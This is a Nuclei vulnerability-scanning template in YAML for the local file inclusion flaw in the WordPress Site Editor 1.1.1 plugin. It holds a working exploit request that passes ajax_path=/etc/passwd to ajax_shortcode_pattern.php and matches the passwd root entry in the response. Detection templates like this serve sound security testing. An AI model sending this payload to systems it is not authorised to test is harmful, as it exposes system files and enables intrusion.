nuclei-templates/vulnerabilities/wordpress/wp-site-editor-lfi.yaml

19 lines
497 B
YAML

id: wp-site-editor-lfi
info:
name: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/44340
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body